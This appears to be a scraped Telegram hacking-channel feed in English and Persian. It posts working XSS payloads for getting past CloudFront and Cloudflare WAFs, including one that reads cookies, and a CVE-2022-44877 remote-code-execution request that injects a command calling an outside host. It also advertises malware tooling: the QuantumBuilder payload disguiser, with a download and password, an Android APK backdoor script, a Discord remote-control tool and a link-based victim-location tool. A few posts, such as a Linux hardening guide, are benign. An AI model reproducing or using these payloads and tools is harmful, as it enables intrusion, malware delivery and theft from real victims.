Pentesting With Kali Linux
Active Directory Pentesting With Kali Linux (RedTeam)
Download
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
Active Directory Pentesting With Kali Linux (RedTeam)
Download
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡8❤2👍2
CloudFront bypass
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
“>%0D%0A%0D%0A<x ‘=”foo”><x foo=’><img src=x onerror=javascript:alert(cloudfrontbypass)//’>#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍10👎3
پیدا کردن لوکیشن دقیق تارگت از طریق ارسال لینک مخرب با ابزار Seeker
GitHub
#Kali #Tools
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
#Kali #Tools
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7👎1
ApkHack-BackDoor
ApkHack-BackDoor is a shell script that simplifies the process of adding a backdoor to any Android APK file.
Github
#tools #android #backdoor
——————
0Day.Today
@LearnExploit
@Tech_Army
ApkHack-BackDoor is a shell script that simplifies the process of adding a backdoor to any Android APK file.
Github
#tools #android #backdoor
——————
0Day.Today
@LearnExploit
@Tech_Army
👍19
Idisagree
Control remote computers using discord bot and python 3.
Github
#discord #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Control remote computers using discord bot and python 3.
Github
#discord #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7❤2👌1
یوتیوب بدون فیلترشکن
لینوکسیها دستورات زیر را به ترتیب داخل ترمینال بزنید و سپس پروکسی زیر را داخل فایرفاکس برای http & https ست کنید تا یوتیوب را باز کند.
Proxy:
*اگر دستور بالا با پایتون نشد با پایتون۳ تست کنید*
GitHub
imem!
#tools
——————
0Day.Today
@LearnExploit
@Tech_Army
لینوکسیها دستورات زیر را به ترتیب داخل ترمینال بزنید و سپس پروکسی زیر را داخل فایرفاکس برای http & https ست کنید تا یوتیوب را باز کند.
Proxy:
127.0.0.1:4500pip install dnspython requests
git clone https://github.com/GFW-knocker/gfw_resist_HTTPS_proxy.git
cd gfw_resist_HTTPS_proxy/
python pyprox_HTTPS_v1.0.py
*اگر دستور بالا با پایتون نشد با پایتون۳ تست کنید*
GitHub
imem!
#tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6❤3👍1
How To Secure A Linux Server
An evolving how-to guide for securing a Linux server.
Github
#linux
——————
0Day.Today
@LearnExploit
@Tech_Army
An evolving how-to guide for securing a Linux server.
Github
#linux
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3
آموزش Steganography با ابزار StegSnow
Link
#linux #Steganography
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#linux #Steganography
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
payloads to bypass CloudFlare WAF
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡9👍1
QuantumBuilder(@LearnExploit).rar
2.5 MB
QUANTUM BUILDER 🔥
QuantumBuilder will make your payload look like any file format (.png, .pdf, .mp4, .doc, ...), you can even disguise them as a folder.
Features:
Spoof ANY extension
300+ different icons available (Microsoft Office ones included)
UAC Bypass
Bypass Windows Smartscreen, EV certs are thing of the past
Decoy (upon opening your .lnk a file of your choosing will be displayed on your victim's pc)
Multiple payloads per .lnk file. Even if one gets detected the rest will still run
Supported payload formats: .exe/.js/.vbs/.bat
Dll payloads
99% FUD, even if you spread your stub. Every build is unique
Execute your exes with admin privileges by prompting UAC with a Microsoft signed binary (powershell.exe)
Run your payload at startup or with a delay
Hide your payloads after executing them
Melt .lnk after execution.
Choose where your payload is dropped on your victim's computer
Compress your shortcut in a .iso/.img to send it as an attachment with ease
Pass: @LearnExploit
QuantumBuilder will make your payload look like any file format (.png, .pdf, .mp4, .doc, ...), you can even disguise them as a folder.
Features:
Spoof ANY extension
300+ different icons available (Microsoft Office ones included)
UAC Bypass
Bypass Windows Smartscreen, EV certs are thing of the past
Decoy (upon opening your .lnk a file of your choosing will be displayed on your victim's pc)
Multiple payloads per .lnk file. Even if one gets detected the rest will still run
Supported payload formats: .exe/.js/.vbs/.bat
Dll payloads
99% FUD, even if you spread your stub. Every build is unique
Execute your exes with admin privileges by prompting UAC with a Microsoft signed binary (powershell.exe)
Run your payload at startup or with a delay
Hide your payloads after executing them
Melt .lnk after execution.
Choose where your payload is dropped on your victim's computer
Compress your shortcut in a .iso/.img to send it as an attachment with ease
Pass: @LearnExploit
🔥14👍3🆒2⚡1❤1👎1
ReconAIzer
A Burp Suite extension to add OpenAI (GPT) on Burp and help you with your Bug Bounty recon to discover endpoints, params, URLs, subdomains and more!
Github
#burp #ai #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
A Burp Suite extension to add OpenAI (GPT) on Burp and help you with your Bug Bounty recon to discover endpoints, params, URLs, subdomains and more!
Github
#burp #ai #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7❤1
0Day.Today | Learn Exploit | Zero World | Dark web |
موتورهای جستجو مخصوص هکرها shodan.io hunter.io censys.io onyphe.io zoomeye.org wigle.net ghostproject.fr viz.Greynoise.io/table app.binaryedge.io fofa.so grep.app crt.sh #Pentest #Serach iliyahr —————— 0Day.Today @LearnExploit @Tech_Army
CensysGPT Beta
We can now generate censys dorks or search query to perform reconnaissance on any target.
gpt.censys.io
#OSINT #ai
——————
0Day.Today
@LearnExploit
@Tech_Army
We can now generate censys dorks or search query to perform reconnaissance on any target.
gpt.censys.io
#OSINT #ai
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9
CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
whoami.{{interactsh-url}}) HTTP/1.1Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7❤1